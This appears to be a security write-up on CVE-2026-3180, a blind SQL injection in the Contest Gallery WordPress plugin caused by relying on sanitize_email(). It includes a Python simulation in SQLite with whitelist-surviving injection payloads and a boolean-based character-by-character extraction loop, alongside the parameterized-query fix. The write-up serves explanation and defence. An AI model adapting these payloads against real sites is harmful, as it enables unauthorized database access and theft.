This write-up details an unauthenticated blind SQL injection vulnerability, tracked as CVE-2026-3180, in the WordPress plugin 'Contest Gallery' versions 28.1.4 and earlier. The root cause is reliance on sanitize_email() to clean the cgl_mail parameter. sanitize_email() validates the shape of an address rather than escaping it for SQL: it strips characters outside its allowed set from the local part, but the single quote is a legal local-part character and is kept. The sanitized value is then interpolated into a query handed to $wpdb->get_row() without going through $wpdb->prepare(), so a quote in the input breaks out of the string literal.
An attacker can exploit this to perform boolean-based blind SQL injection by sending crafted AJAX requests to the admin-ajax.php endpoint. The accompanying Python proof-of-concept triggers the flaw by injecting SQL into the email field and infers database contents from the difference in responses, without any authentication. The correct remediation is to bind the value with $wpdb->prepare() (or an equivalent parameterized query) rather than relying on sanitize_email(), which was never an SQL-escaping function.
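To make the bug class concrete, the following is an added example, not the plugin's code and not the original Python proof-of-concept. It reproduces the described pattern in SQLite with a constructed table, using an approximation of sanitize_email()'s local-part whitelist (an assumption modelled on wp-includes/formatting.php; the real function also runs filter hooks), and runs a boolean-based extraction loop that stays within the characters that whitelist keeps. The table `members`, its rows, and the `/**/`-based payload are illustrative and are not the CVE's real query or payload.

```python
"""Added illustration: the sanitize_email()-then-get_row() bug class in SQLite."""
import re
import sqlite3

# Approximation of WordPress sanitize_email() (assumption: modelled on
# wp-includes/formatting.php). The single quote is in the allowed
# local-part character set, which is the whole problem.
_LOCAL_DISALLOWED = re.compile(r"[^a-zA-Z0-9!#$%&'*+/=?^_`{|}~.\-]")


def approx_sanitize_email(email: str) -> str:
    """Return the sanitised address, or '' where WordPress would reject it."""
    if len(email) < 6 or "@" not in email[1:]:
        return ""
    local, domain = email.split("@", 1)
    local = _LOCAL_DISALLOWED.sub("", local)          # the quote survives here
    if not local:
        return ""
    domain = re.sub(r"\.{2,}", "", domain).strip(" \t\n\r\0\x0b.")
    subs = []
    for sub in domain.split("."):
        sub = re.sub(r"[^a-z0-9-]+", "", sub.strip(" \t\n\r\0\x0b-"), flags=re.I)
        if sub:
            subs.append(sub)
    if len(subs) < 2:
        return ""
    return f"{local}@{'.'.join(subs)}"


# Constructed sample data standing in for the plugin's table.
CONN = sqlite3.connect(":memory:")
CONN.executescript(
    """
    CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT, secret TEXT);
    INSERT INTO members VALUES (1, 'alice@example.com', 's3cr3t-t0ken');
    INSERT INTO members VALUES (2, 'bob@example.com', 'other-value-99');
    """
)


def vulnerable_lookup(raw_email: str):
    """Mirrors the vulnerable pattern: sanitize_email(), then a
    string-concatenated query given to $wpdb->get_row() with no prepare()."""
    email = approx_sanitize_email(raw_email)
    if not email:
        return None
    sql = f"SELECT id, email, secret FROM members WHERE email = '{email}'"
    return CONN.execute(sql).fetchone()


def safe_lookup(raw_email: str):
    """The fix: bind the value, the analogue of
    $wpdb->get_row($wpdb->prepare('... WHERE email = %s', $email))."""
    email = approx_sanitize_email(raw_email)
    if not email:
        return None
    return CONN.execute(
        "SELECT id, email, secret FROM members WHERE email = ?", (email,)
    ).fetchone()


# Boolean oracle for the simulation. The payload uses only characters the
# local-part whitelist keeps: no spaces (/**/ stands in), no parentheses,
# no commas. Closing with OR/**/' turns the domain that sanitize_email()
# insists on into a harmless trailing string literal '@a.b'.
def oracle(row_id: int, like_pattern: str) -> bool:
    payload = (
        f"x'/**/OR/**/id={row_id}/**/AND/**/secret/**/LIKE/**/'{like_pattern}'"
        "/**/OR/**/'@a.b"
    )
    return vulnerable_lookup(payload) is not None


# Alphabet deliberately excludes the LIKE wildcards % and _ and the quote.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-"


def blind_extract(ask, row_id: int, alphabet: str = ALPHABET, max_len: int = 64) -> str:
    """Recover a column value one character at a time with LIKE prefix probes."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            if ask(row_id, known + ch + "%"):
                known += ch
                break
        else:
            break                                     # nothing extends the prefix
    return known


if __name__ == "__main__":
    demo = "x'/**/OR/**/1=1/**/OR/**/'@a.b"
    print("sanitize_email() keeps the payload:", approx_sanitize_email(demo) == demo)
    print("vulnerable_lookup:", vulnerable_lookup(demo), " safe_lookup:", safe_lookup(demo))
    print("extracted secret for id=1:", blind_extract(oracle, 1))
```

Two points worth noticing in the simulation. First, the same input passes through the same sanitizer in both lookups; only binding the value stops the injection, so the defence belongs in the query, not in the input filter. Second, the whitelist does shape what an attacker can send: it strips spaces, parentheses and commas from the local part, which is why the simulated probe uses inline comments for whitespace and LIKE prefix matching instead of substr()/ASCII comparisons, while `%` and `=` survive untouched. How the real PoC builds its payload is not covered here.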